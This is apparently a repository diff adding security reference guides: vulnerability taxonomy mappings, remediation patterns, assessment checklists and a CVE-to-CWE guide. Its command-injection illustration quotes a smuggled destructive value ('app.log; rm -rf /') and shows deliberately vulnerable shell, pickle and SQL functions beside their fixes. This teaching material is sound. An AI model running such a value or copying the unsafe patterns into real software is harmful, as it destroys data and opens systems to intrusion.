| **A05:2021** | Security Misconfiguration | Default configs, verbose errors, unnecessary features |
| **A06:2021** | Vulnerable Components | Outdated libraries, unpatched dependencies |
| **A07:2021** | Auth & Session Failures | Weak passwords, session fixation, missing MFA |
| **A08:2021** | Software & Data Integrity | Unsigned updates, insecure CI/CD, deserialization |
| **A09:2021** | Logging & Monitoring Failures | Insufficient logging, no alerting, log injection |
| **A10:2021** | SSRF | Server-side request forgery, unvalidated redirects |
**Usage**: When reporting findings, map to primary OWASP category and reference the identifier (e.g., "A03:2021 - Injection").
### CWE Mappings
Map to relevant Common Weakness Enumeration categories for precise vulnerability classification:
#### Injection Vulnerabilities
- **CWE-78**: OS Command Injection
- **CWE-79**: Cross-site Scripting (XSS)
- **CWE-89**: SQL Injection
- **CWE-90**: LDAP Injection
- **CWE-91**: XML Injection
- **CWE-94**: Code Injection
#### Authentication & Authorization
- **CWE-287**: Improper Authentication
- **CWE-288**: Authentication Bypass Using Alternate Path
- **CWE-290**: Authentication Bypass by Spoofing
- **CWE-294**: Authentication Bypass by Capture-replay
- **CWE-306**: Missing Authentication for Critical Function
- **CWE-307**: Improper Restriction of Excessive Authentication Attempts
- **CWE-352**: Cross-Site Request Forgery (CSRF)
#### Cryptographic Issues
- **CWE-256**: Plaintext Storage of Password
- **CWE-259**: Use of Hard-coded Password
- **CWE-261**: Weak Encoding for Password
- **CWE-321**: Use of Hard-coded Cryptographic Key
- **CWE-326**: Inadequate Encryption Strength
- **CWE-327**: Use of Broken or Risky Cryptographic Algorithm
- **CWE-329**: Not Using a Random IV with CBC Mode
- **CWE-798**: Use of Hard-coded Credentials
#### Input Validation
- **CWE-20**: Improper Input Validation
- **CWE-73**: External Control of File Name or Path
- **CWE-434**: Unrestricted Upload of File with Dangerous Type
- **CWE-601**: URL Redirection to Untrusted Site
#### Sensitive Data Exposure
- **CWE-200**: Information Exposure
- **CWE-209**: Information Exposure Through Error Message
- **CWE-312**: Cleartext Storage of Sensitive Information
- **CWE-319**: Cleartext Transmission of Sensitive Information
- **CWE-532**: Information Exposure Through Log Files
**Usage**: Include CWE identifier in all vulnerability reports for standardized classification.
### MITRE ATT&CK
Reference relevant tactics and techniques for threat context:
#### Initial Access (TA0001)
- **T1190**: Exploit Public-Facing Application
- **T1133**: External Remote Services
- **T1078**: Valid Accounts
#### Execution (TA0002)
- **T1059**: Command and Scripting Interpreter
- **T1203**: Exploitation for Client Execution
#### Persistence (TA0003)
- **T1098**: Account Manipulation
- **T1136**: Create Account
- **T1505**: Server Software Component
#### Privilege Escalation (TA0004)
- **T1068**: Exploitation for Privilege Escalation
- **T1548**: Abuse Elevation Control Mechanism
#### Defense Evasion (TA0005)
- **T1027**: Obfuscated Files or Information
- **T1140**: Deobfuscate/Decode Files or Information
- **T1562**: Impair Defenses
#### Credential Access (TA0006)
- **T1110**: Brute Force
- **T1555**: Credentials from Password Stores
- **T1552**: Unsecured Credentials
#### Discovery (TA0007)
- **T1083**: File and Directory Discovery
- **T1046**: Network Service Scanning
#### Collection (TA0009)
- **T1005**: Data from Local System
- **T1114**: Email Collection
#### Exfiltration (TA0010)
- **T1041**: Exfiltration Over C2 Channel
- **T1567**: Exfiltration Over Web Service
**Usage**: When identifying vulnerabilities, consider which ATT&CK techniques an attacker could use to exploit them.
---
## Remediation Patterns
This section provides specific remediation guidance for common vulnerability types.
### SQL Injection Remediation
**Step 1: Identify vulnerable queries**
- Search for string concatenation in SQL queries
- Check for f-strings or format() with SQL keywords
- Review all database interaction code
**Step 2: Apply parameterized queries**
```python
# Python with sqlite3
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Python with psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# Python with SQLAlchemy (ORM)
from sqlalchemy import text
result = session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
```
**Step 3: Validate and sanitize input** (defense in depth)
```python
import re
# Validate input format
if not re.match(r'^\d+$', user_id):
raise ValueError("Invalid user ID format")
# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```
**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries
### XSS Remediation
**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled
**Step 2: Use framework-specific safe methods**
```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>
// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>
// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```
**Step 3: Sanitize when HTML is required**
```javascript
import DOMPurify from 'dompurify';
// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
ALLOWED_ATTR: []
});
```
**Step 4: Content Security Policy (CSP)**
```html
<!-- Deliver CSP as an HTTP response header (preferred) or as a meta tag -->
<!-- Header: Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}' -->
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' 'nonce-{random}'">
```
---
## Advanced Configuration
This section contains detailed configuration options and tuning parameters.
### Example: SAST Tool Configuration
```yaml
# Advanced security scanner configuration
scanner:
# Severity threshold
severity_threshold: MEDIUM
# Rule configuration
rules:
enabled:
- sql-injection
- xss
- hardcoded-secrets
disabled:
- informational-only
# False positive reduction
confidence_threshold: HIGH
exclude_patterns:
- "*/test/*"
- "*/tests/*"
- "*/node_modules/*"
- "*.test.js"
- "*.spec.ts"
# Performance tuning
max_file_size_kb: 2048
timeout_seconds: 300
parallel_jobs: 4
# Output configuration
output_format: json
include_code_snippets: true
max_snippet_lines: 10
```
---
## Examples and Code Samples
This section provides comprehensive code examples for various scenarios.
### Example 1: Secure API Authentication
```python
# Secure API key handling
import os
from functools import wraps
from flask import Flask, request, jsonify
app = Flask(__name__)
# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
raise ValueError("API_KEY environment variable not set")
def require_api_key(f):
@wraps(f)
def decorated_function(*args, **kwargs):
api_key = request.headers.get('X-API-Key')
if not api_key:
return jsonify({'error': 'API key required'}), 401
# Constant-time comparison to prevent timing attacks
import hmac
if not hmac.compare_digest(api_key, VALID_API_KEY):
return jsonify({'error': 'Invalid API key'}), 403
return f(*args, **kwargs)
return decorated_function
@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
return jsonify({'message': 'Access granted'})
```
### Example 2: Secure Password Hashing
```python
# Secure password storage with bcrypt
import bcrypt
def hash_password(password: str) -> str:
"""Hash a password using bcrypt."""
# Generate salt and hash password
salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)
hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
return hashed.decode('utf-8')
def verify_password(password: str, hashed: str) -> bool:
"""Verify a password against a hash."""
return bcrypt.checkpw(
password.encode('utf-8'),
hashed.encode('utf-8')
)
# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash) # True
```
### Example 3: Secure File Upload
```python
# Secure file upload with validation
import os
import magic
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
'application/pdf',
'image/png',
'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
def is_allowed_file(filename: str, file_content: bytes) -> bool:
"""Validate file extension and MIME type."""
# Check extension
if '.' not in filename:
return False
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
return False
# Check MIME type (prevent extension spoofing)
mime = magic.from_buffer(file_content, mime=True)
if mime not in ALLOWED_MIME_TYPES:
return False
return True
def handle_upload(file):
"""Securely handle file upload."""
# Check file size
file.seek(0, os.SEEK_END)
size = file.tell()
file.seek(0)
if size > MAX_FILE_SIZE:
raise ValueError("File too large")
# Read content for validation
content = file.read()
file.seek(0)
# Validate file type
if not is_allowed_file(file.filename, content):
raise ValueError("Invalid file type")
# Sanitize filename
filename = secure_filename(file.filename)
# Generate unique filename to prevent overwrite attacks
import uuid
unique_filename = f"{uuid.uuid4()}_{filename}"
# Save to secure location (outside web root)
upload_path = os.path.join('/secure/uploads', unique_filename)
file.save(upload_path)
return unique_filename
```
---
## Best Practices for Reference Documents
1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8. **Be concise** - Even in references, challenge every sentence

View File

@@ -0,0 +1,253 @@
# Workflow Checklist Template
This template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.
## Pattern 1: Sequential Workflow Checklist
Use this pattern for operations that must be completed in order, step-by-step.
### Security Assessment Workflow
Progress:
[ ] 1. Identify application entry points and attack surface
[ ] 2. Map authentication and authorization flows
[ ] 3. Identify data flows and sensitive data handling
[ ] 4. Review existing security controls
[ ] 5. Document findings with framework references (OWASP, CWE)
[ ] 6. Prioritize findings by severity (CVSS scores)
[ ] 7. Generate report with remediation recommendations
Work through each step systematically. Check off completed items.
---
## Pattern 2: Conditional Workflow
Use this pattern when the workflow branches based on findings or conditions.
### Vulnerability Remediation Workflow
1. Identify vulnerability type
- If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)
- If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)
- If Authentication flaw → See [auth-remediation.md](auth-remediation.md)
- If Authorization flaw → See [authz-remediation.md](authz-remediation.md)
- If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)
2. Assess severity using CVSS calculator (a small helper sketch follows this workflow)
- If CVSS >= 9.0 → Priority: Critical (immediate action)
- If CVSS 7.0-8.9 → Priority: High (action within 24h)
- If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)
- If CVSS < 4.0 → Priority: Low (action within 30 days)
3. Apply appropriate remediation pattern
4. Validate fix with security testing
5. Document changes and update security documentation
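The CVSS-to-priority mapping in step 2 can also be captured as a small helper for automation; the thresholds below simply restate the tiers above (illustrative Python sketch, not part of this repository):
```python
def remediation_priority(cvss_score: float) -> str:
    """Map a CVSS base score to the remediation priority tiers listed above."""
    if cvss_score >= 9.0:
        return "Critical - immediate action"
    if cvss_score >= 7.0:
        return "High - action within 24h"
    if cvss_score >= 4.0:
        return "Medium - action within 1 week"
    return "Low - action within 30 days"
```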
---
## Pattern 3: Iterative Workflow
Use this pattern for operations that repeat across multiple targets or items.
### Code Security Review Workflow
For each file in the review scope:
1. Identify security-sensitive operations (auth, data access, crypto, input handling)
2. Check against secure coding patterns for the language
3. Flag potential vulnerabilities with severity rating
4. Map findings to CWE and OWASP categories
5. Suggest specific remediation approaches
6. Document finding with code location and fix priority
Continue until all files in scope have been reviewed.
---
## Pattern 4: Feedback Loop Workflow
Use this pattern when validation and iteration are required.
### Secure Configuration Generation Workflow
1. Generate initial security configuration based on requirements
2. Run validation script: `./scripts/validate_config.py config.yaml` (a minimal sketch of such a validator appears after this pattern)
3. Review validation output:
- Note all errors (must fix)
- Note all warnings (should fix)
- Note all info items (consider)
4. Fix identified issues in configuration
5. Repeat steps 2-4 until validation passes with zero errors
6. Review warnings and determine if they should be addressed
7. Apply configuration once validation is clean
**Validation Loop**: Run validator → Fix errors → Repeat until clean
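A minimal sketch of what such a validator could look like; the script name, the config keys checked, and the PyYAML dependency are illustrative assumptions, not part of this repository:
```python
#!/usr/bin/env python3
"""Minimal config validator: prints errors and exits non-zero when any are found."""
import sys
import yaml  # assumes PyYAML is installed

REQUIRED_KEYS = {"severity_threshold", "rules"}  # illustrative checks only

def validate(path: str) -> int:
    with open(path) as fh:
        config = yaml.safe_load(fh) or {}
    errors = [f"missing key: {key}" for key in sorted(REQUIRED_KEYS) if key not in config]
    for issue in errors:
        print(f"ERROR: {issue}")
    print(f"{len(errors)} error(s) found")
    return 1 if errors else 0

if __name__ == "__main__":
    sys.exit(validate(sys.argv[1]))
```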
---
## Pattern 5: Parallel Analysis Workflow
Use this pattern when multiple independent analyses can run concurrently.
### Comprehensive Security Scan Workflow
Run these scans in parallel:
**Static Analysis**:
[ ] 1a. Run SAST scan (Semgrep/Bandit)
[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)
[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)
[ ] 1d. Run license compliance check
**Dynamic Analysis**:
[ ] 2a. Run DAST scan (ZAP/Burp)
[ ] 2b. Run API security testing
[ ] 2c. Run authentication/authorization testing
**Infrastructure Analysis**:
[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)
[ ] 3b. Run container image scan (Trivy/Grype)
[ ] 3c. Run configuration review
**Consolidation**:
[ ] 4. Aggregate all findings
[ ] 5. Deduplicate and correlate findings
[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)
[ ] 7. Generate unified security report
---
## Pattern 6: Research and Documentation Workflow
Use this pattern for security research and documentation tasks.
### Threat Modeling Workflow
Research Progress:
[ ] 1. Identify system components and boundaries
[ ] 2. Map data flows between components
[ ] 3. Identify trust boundaries
[ ] 4. Enumerate assets (data, services, credentials)
[ ] 5. Apply STRIDE framework to each component:
- Spoofing threats
- Tampering threats
- Repudiation threats
- Information disclosure threats
- Denial of service threats
- Elevation of privilege threats
[ ] 6. Map threats to MITRE ATT&CK techniques
[ ] 7. Identify existing mitigations
[ ] 8. Document residual risks
[ ] 9. Recommend additional security controls
[ ] 10. Generate threat model document
Work through each step systematically. Check off completed items.
---
## Pattern 7: Compliance Validation Workflow
Use this pattern for compliance checks against security standards.
### Security Compliance Audit Workflow
**SOC 2 Controls Review**:
[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)
[ ] 2. Verify logical access controls implementation (CC6.1)
[ ] 3. Review authentication mechanisms (CC6.1)
[ ] 4. Verify encryption implementation (CC6.1, CC6.7)
[ ] 5. Review audit logging configuration (CC7.2)
[ ] 6. Verify security monitoring (CC7.2, CC7.3)
[ ] 7. Review incident response procedures (CC7.3, CC7.4)
[ ] 8. Verify backup and recovery processes (A1.2, A1.3)
**Evidence Collection**:
[ ] 9. Collect policy documents
[ ] 10. Collect configuration screenshots
[ ] 11. Collect audit logs
[ ] 12. Document control gaps
[ ] 13. Generate compliance report
---
## Pattern 8: Incident Response Workflow
Use this pattern for security incident handling.
### Security Incident Response Workflow
**Detection and Analysis**:
[ ] 1. Confirm security incident (rule out false positive)
[ ] 2. Determine incident severity (SEV1/2/3/4)
[ ] 3. Identify affected systems and data
[ ] 4. Preserve evidence (logs, memory dumps, network captures)
**Containment**:
[ ] 5. Isolate affected systems (network segmentation)
[ ] 6. Disable compromised accounts
[ ] 7. Block malicious indicators (IPs, domains, hashes)
[ ] 8. Implement temporary compensating controls
**Eradication**:
[ ] 9. Identify root cause
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
[ ] 11. Patch vulnerabilities exploited
[ ] 12. Reset compromised credentials
**Recovery**:
[ ] 13. Restore systems from clean backups (if needed)
[ ] 14. Re-enable systems with monitoring
[ ] 15. Verify system integrity
[ ] 16. Resume normal operations
**Post-Incident**:
[ ] 17. Document incident timeline
[ ] 18. Identify lessons learned
[ ] 19. Update security controls to prevent recurrence
[ ] 20. Update incident response procedures
[ ] 21. Communicate with stakeholders
---
## Usage Guidelines
### When to Use Workflow Checklists
**Use checklists for**:
- Complex multi-step operations
- Operations requiring specific order
- Security assessments and audits
- Incident response procedures
- Compliance validation tasks
**Don't use checklists for**:
- Simple single-step operations
- Highly dynamic exploratory work
- Operations that vary significantly each time
### Adapting This Template
1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file
2. **Customize steps** to match your specific security tool or process
3. **Add framework references** (OWASP, CWE, NIST) where applicable
4. **Include tool-specific commands** for automation
5. **Add decision points** where manual judgment is required
### Checklist Best Practices
- **Be specific**: "Run semgrep --config=auto ." not "Scan the code"
- **Include success criteria**: "Validation passes with 0 errors"
- **Reference standards**: Link to OWASP, CWE, NIST where relevant
- **Show progress**: Checkbox format helps track completion
- **Provide escape hatches**: "If validation fails, see troubleshooting.md"
### Integration with Feedback Loops
Combine checklists with validation scripts for maximum effectiveness:
1. Create checklist for the workflow
2. Provide validation script that checks quality
3. Include "run validator" step in checklist
4. Loop: Complete step → Validate → Fix issues → Re-validate
This pattern dramatically improves output quality through systematic validation.

View File

@@ -0,0 +1,348 @@
# CVE to CWE and OWASP Top 10 Mapping
## Table of Contents
- [Common Vulnerability Patterns](#common-vulnerability-patterns)
- [OWASP Top 10 2021 Mapping](#owasp-top-10-2021-mapping)
- [CWE Top 25 Mapping](#cwe-top-25-mapping)
- [Dependency Vulnerability Categories](#dependency-vulnerability-categories)
## Common Vulnerability Patterns
### Injection Vulnerabilities in Dependencies
**OWASP**: A03:2021 - Injection
**CWE**: CWE-89 (SQL Injection), CWE-78 (OS Command Injection)
Common in:
- ORM libraries with unsafe query construction
- Template engines with code execution features
- Database drivers with insufficient input sanitization
**Example CVEs**:
- CVE-2021-44228 (Log4Shell) - Remote Code Execution via JNDI injection
- CVE-2022-22965 (Spring4Shell) - RCE via Spring Framework
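For the CWE-78 case, the dependency-level flaw usually reduces to shelling out with attacker-influenced strings. A minimal Python illustration of the pattern (not tied to a specific library or CVE):
```python
import subprocess

def archive_logs_unsafe(filename: str) -> None:
    # Vulnerable (CWE-78): the filename is parsed by the shell, so an input like
    # "app.log; rm -rf /" would run a second command.
    subprocess.run(f"tar -czf backup.tgz {filename}", shell=True, check=True)

def archive_logs_safe(filename: str) -> None:
    # Safer: pass arguments as a list so no shell parsing occurs.
    subprocess.run(["tar", "-czf", "backup.tgz", filename], check=True)
```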
### Deserialization Vulnerabilities
**OWASP**: A08:2021 - Software and Data Integrity Failures
**CWE**: CWE-502 (Deserialization of Untrusted Data)
Common in:
- Java serialization libraries (Jackson, XStream, etc.)
- Python pickle
- PHP unserialize
**Example CVEs**:
- CVE-2017-9805 (Apache Struts REST plugin) - RCE via XStream deserialization
- CVE-2019-12384 (Jackson) - Polymorphic typing RCE
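The pickle case above reduces to a simple rule: never deserialize untrusted bytes with a code-executing format. A minimal Python illustration (not tied to the CVEs listed):
```python
import json
import pickle

def load_profile_unsafe(blob: bytes):
    # Vulnerable (CWE-502): pickle can execute attacker-supplied code via __reduce__.
    return pickle.loads(blob)

def load_profile_safe(blob: bytes) -> dict:
    # Safer: parse a data-only format and validate the expected shape.
    data = json.loads(blob.decode("utf-8"))
    if not isinstance(data, dict) or "username" not in data:
        raise ValueError("unexpected profile structure")
    return data
```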
### Authentication and Cryptography Flaws
**OWASP**: A02:2021 - Cryptographic Failures
**CWE**: CWE-327 (Broken Crypto), CWE-311 (Missing Encryption)
Common in:
- Outdated cryptographic libraries
- JWT libraries with algorithm confusion
- SSL/TLS implementations with weak ciphers
**Example CVEs**:
- CVE-2022-21449 (Java ECDSA) - Signature validation bypass
- CVE-2014-0160 (OpenSSL "Heartbleed") - Memory disclosure in TLS heartbeat handling
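For the JWT algorithm-confusion case, the defensive pattern is to pin the accepted algorithms rather than trusting the token's own header. A PyJWT-based sketch (PyJWT is an assumed library choice; adapt to whatever JWT library is in use):
```python
import jwt  # PyJWT

def verify_token(token: str, rsa_public_key: str) -> dict:
    # Pinning algorithms=["RS256"] prevents downgrading verification to HS256
    # with the public key misused as the HMAC secret.
    return jwt.decode(token, rsa_public_key, algorithms=["RS256"])
```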
### XML External Entity (XXE)
**OWASP**: A05:2021 - Security Misconfiguration
**CWE**: CWE-611 (XML External Entities)
Common in:
- XML parsers with external entity processing enabled by default
- SOAP/XML-RPC libraries
**Example CVEs**:
- CVE-2016-3674 (XStream) - XXE via external entity processing
- CVE-2014-3529 (Apache POI) - XXE when parsing OOXML documents
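On the consuming side, the usual mitigation is to parse untrusted XML with external entity resolution disabled. In Python this is what defusedxml provides by default (sketch; defusedxml assumed to be installed):
```python
from defusedxml import ElementTree as SafeET  # rejects DTDs/external entities by default

def parse_untrusted_xml(xml_bytes: bytes):
    # Raises a defusedxml exception instead of resolving external entities.
    return SafeET.fromstring(xml_bytes)
```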
## OWASP Top 10 2021 Mapping
### A01:2021 - Broken Access Control
**Related CWEs**:
- CWE-22: Path Traversal
- CWE-284: Improper Access Control
- CWE-639: Insecure Direct Object Reference
**Dependency Examples**:
- File handling libraries with path traversal
- Authorization libraries with bypass vulnerabilities
- API frameworks with missing access controls
### A02:2021 - Cryptographic Failures
**Related CWEs**:
- CWE-327: Use of Broken Cryptography
- CWE-328: Weak Hash
- CWE-331: Insufficient Entropy
**Dependency Examples**:
- Outdated OpenSSL/BoringSSL versions
- Weak hash implementations (MD5, SHA1)
- Insecure random number generators
### A03:2021 - Injection
**Related CWEs**:
- CWE-89: SQL Injection
- CWE-78: OS Command Injection
- CWE-94: Code Injection
**Dependency Examples**:
- ORM libraries with unsafe queries
- Template engines with code execution
- Shell command utilities
### A04:2021 - Insecure Design
**Related CWEs**:
- CWE-209: Information Exposure Through Error Messages
- CWE-256: Plaintext Storage of Password
- CWE-918: SSRF
**Dependency Examples**:
- Libraries with verbose error messages
- Frameworks with insecure defaults
- HTTP clients vulnerable to SSRF
### A05:2021 - Security Misconfiguration
**Related CWEs**:
- CWE-611: XXE
- CWE-16: Configuration
- CWE-2: Environmental Security
**Dependency Examples**:
- XML parsers with XXE by default
- Web frameworks with debug mode enabled
- Default credentials in libraries
### A06:2021 - Vulnerable and Outdated Components
**Related CWEs**:
- CWE-1035: Using Components with Known Vulnerabilities (OWASP Top Ten 2017 A9 category)
- CWE-1104: Use of Unmaintained Third Party Components
**This is the primary focus of SCA tools like Black Duck**
Key risks:
- Dependencies with known CVEs
- Unmaintained or abandoned libraries
- Transitive dependencies with vulnerabilities
- License compliance issues
### A07:2021 - Identification and Authentication Failures
**Related CWEs**:
- CWE-287: Improper Authentication
- CWE-306: Missing Authentication
- CWE-798: Hard-coded Credentials
**Dependency Examples**:
- OAuth/OIDC libraries with bypass vulnerabilities
- JWT libraries with algorithm confusion
- Session management libraries with fixation issues
### A08:2021 - Software and Data Integrity Failures
**Related CWEs**:
- CWE-502: Deserialization of Untrusted Data
- CWE-829: Inclusion of Functionality from Untrusted Control Sphere
- CWE-494: Download of Code Without Integrity Check
**Dependency Examples**:
- Serialization libraries (Jackson, pickle, etc.)
- Package managers vulnerable to dependency confusion
- Libraries fetching code over HTTP
### A09:2021 - Security Logging and Monitoring Failures
**Related CWEs**:
- CWE-778: Insufficient Logging
- CWE-117: Log Injection
- CWE-532: Information Exposure Through Log Files
**Dependency Examples**:
- Logging libraries with injection vulnerabilities (Log4Shell)
- Frameworks with insufficient audit logging
- Libraries exposing sensitive data in logs
### A10:2021 - Server-Side Request Forgery (SSRF)
**Related CWEs**:
- CWE-918: SSRF
**Dependency Examples**:
- HTTP client libraries with insufficient validation
- URL parsing libraries with bypass issues
- Image processing libraries fetching remote resources
## CWE Top 25 Mapping
### Top 5 Most Dangerous in Dependencies
1. **CWE-502: Deserialization of Untrusted Data**
- Found in: Java (Jackson, XStream), Python (pickle), .NET
- CVSS typically: 9.0-10.0
- Remediation: Upgrade to patched versions, avoid deserializing untrusted data
2. **CWE-78: OS Command Injection**
- Found in: Shell utilities, process execution libraries
- CVSS typically: 8.0-9.8
- Remediation: Use parameterized APIs, input validation
3. **CWE-89: SQL Injection**
- Found in: Database drivers, ORM libraries
- CVSS typically: 8.0-9.8
- Remediation: Use parameterized queries, upgrade to patched versions (see the sketch after this list)
4. **CWE-79: Cross-site Scripting (XSS)**
- Found in: Template engines, HTML sanitization libraries
- CVSS typically: 6.1-7.5
- Remediation: Context-aware output encoding, upgrade libraries
5. **CWE-611: XML External Entity (XXE)**
- Found in: XML parsers (dom4j, Xerces, etc.)
- CVSS typically: 7.5-9.1
- Remediation: Disable external entity processing, upgrade parsers
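As noted for item 3, the core SQL injection remediation is parameterized queries instead of string concatenation. A minimal sketch using Python's built-in sqlite3 driver (table and values are illustrative):
```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")

user_supplied = "alice'; DROP TABLE users; --"

# Vulnerable: attacker-controlled input concatenated into the statement
# rows = conn.execute(f"SELECT * FROM users WHERE name = '{user_supplied}'")

# Safe: the driver binds the value as data, never as SQL
rows = conn.execute("SELECT * FROM users WHERE name = ?", (user_supplied,)).fetchall()
print(rows)
```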
## Dependency Vulnerability Categories
### Remote Code Execution (RCE)
**Severity**: CRITICAL
**CVSS Range**: 9.0-10.0
**Common Patterns**:
- Deserialization vulnerabilities
- Template injection
- Expression language injection
- JNDI injection (Log4Shell)
**Remediation Priority**: IMMEDIATE
### Authentication Bypass
**Severity**: CRITICAL/HIGH
**CVSS Range**: 7.5-9.8
**Common Patterns**:
- JWT signature bypass
- OAuth implementation flaws
- Session fixation
- Hard-coded credentials
**Remediation Priority**: IMMEDIATE
### Information Disclosure
**Severity**: MEDIUM/HIGH
**CVSS Range**: 5.3-7.5
**Common Patterns**:
- Path traversal in file handlers
- XXE with data exfiltration
- Error messages exposing internals
- Memory disclosure bugs
**Remediation Priority**: HIGH
### Denial of Service (DoS)
**Severity**: MEDIUM
**CVSS Range**: 5.3-7.5
**Common Patterns**:
- Regular expression DoS (ReDoS)
- XML bomb attacks
- Resource exhaustion
- Algorithmic complexity attacks
**Remediation Priority**: MEDIUM (unless affecting critical services)
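For the ReDoS pattern above, a common compensating control is to bound input size (and avoid nested quantifiers) before handing text to a backtracking regex engine. A minimal sketch, not tied to any particular library:
```python
import re

# Nested quantifiers such as (a+)+$ backtrack catastrophically on near-miss input
VULNERABLE = re.compile(r"^(a+)+$")

def safe_match(pattern: re.Pattern, text: str, max_len: int = 1000):
    # Rejecting oversized input caps the worst-case work the engine can do
    if len(text) > max_len:
        raise ValueError("input too long for regex evaluation")
    return pattern.match(text)

print(bool(safe_match(VULNERABLE, "a" * 50)))  # small input, completes quickly
```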
### Prototype Pollution (JavaScript)
**Severity**: HIGH
**CVSS Range**: 7.0-8.8
**Common Patterns**:
- Object merge/extend functions
- JSON parsing libraries
- Template engines
**Remediation Priority**: HIGH
## Supply Chain Attack Patterns
### Dependency Confusion
**CWE**: CWE-494 (Download of Code Without Integrity Check)
**Description**: An attacker publishes a malicious package to a public registry under the same name as an internal package.
**Detection**: Black Duck detects unexpected package sources and registry changes.
**Mitigation**:
- Use private registry with higher priority
- Implement package name reservations
- Enable registry allowlists
### Typosquatting
**CWE**: CWE-829 (Inclusion of Functionality from Untrusted Control Sphere)
**Description**: Malicious packages with names similar to popular packages.
**Detection**: Component quality analysis, community reputation scoring.
**Mitigation**:
- Review all new dependencies carefully
- Use dependency lock files
- Enable automated typosquatting detection
### Compromised Maintainer Accounts
**CWE**: CWE-1294 (Insecure Security Identifier Mechanism)
**Description**: An attacker gains access to a legitimate package maintainer's account and publishes malicious releases.
**Detection**: Unexpected version updates, behavior changes, new maintainers.
**Mitigation**:
- Pin dependency versions
- Review all dependency updates
- Monitor for suspicious changes
## Remediation Priority Matrix
| Severity | Exploitability | Remediation Timeline |
|----------|---------------|---------------------|
| CRITICAL | High | 24-48 hours |
| HIGH | High | 1 week |
| HIGH | Low | 2 weeks |
| MEDIUM | High | 1 month |
| MEDIUM | Low | 3 months |
| LOW | Any | Next maintenance cycle |
**Factors influencing priority**:
- Exploit availability (PoC, Metasploit module, etc.)
- Attack surface (internet-facing vs. internal)
- Data sensitivity
- Compliance requirements
- Patch availability
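Teams that automate triage can encode the matrix directly; the sketch below simply mirrors the table and leaves unlisted combinations to manual judgment:
```python
# Remediation timelines keyed by (severity, exploitability), mirroring the matrix above
REMEDIATION_SLA = {
    ("CRITICAL", "HIGH"): "24-48 hours",
    ("HIGH", "HIGH"): "1 week",
    ("HIGH", "LOW"): "2 weeks",
    ("MEDIUM", "HIGH"): "1 month",
    ("MEDIUM", "LOW"): "3 months",
}

def remediation_timeline(severity: str, exploitability: str) -> str:
    if severity.upper() == "LOW":
        return "Next maintenance cycle"
    # Combinations not in the table (e.g. CRITICAL/LOW) still need human judgment
    return REMEDIATION_SLA.get((severity.upper(), exploitability.upper()),
                               "Escalate for manual triage")

print(remediation_timeline("HIGH", "low"))  # -> "2 weeks"
```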
## References
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [CWE Top 25](https://cwe.mitre.org/top25/)
- [NVD CVE Database](https://nvd.nist.gov/)
- [MITRE ATT&CK](https://attack.mitre.org/)
- [FIRST CVSS Calculator](https://www.first.org/cvss/calculator/3.1)

View File

@@ -0,0 +1,472 @@
# License Compliance Risk Assessment Guide
## Table of Contents
- [License Risk Categories](#license-risk-categories)
- [Common Open Source Licenses](#common-open-source-licenses)
- [License Compatibility](#license-compatibility)
- [Compliance Workflows](#compliance-workflows)
- [Legal Considerations](#legal-considerations)
## License Risk Categories
### High Risk - Copyleft (Strong)
**Licenses**: GPL-2.0, GPL-3.0, AGPL-3.0
**Characteristics**:
- Requires derivative works to be open-sourced under same license
- Source code distribution mandatory
- AGPL extends to network use (SaaS applications)
**Business Impact**: HIGH
- May require releasing proprietary code as open source
- Incompatible with most commercial software
- Legal review required for any usage
**Use Cases Where Allowed**:
- Internal tools (not distributed)
- Separate services with network boundaries
- Dual-licensed components (use commercial license)
**Example Compliance Violation**:
```
Product: Commercial SaaS Application
Dependency: GPL-licensed library linked into application
Issue: AGPL requires source code release for network-accessible software
Risk: Legal liability, forced open-sourcing
```
### Medium Risk - Weak Copyleft
**Licenses**: LGPL-2.1, LGPL-3.0, MPL-2.0, EPL-2.0
**Characteristics**:
- Copyleft applies only to modified library files
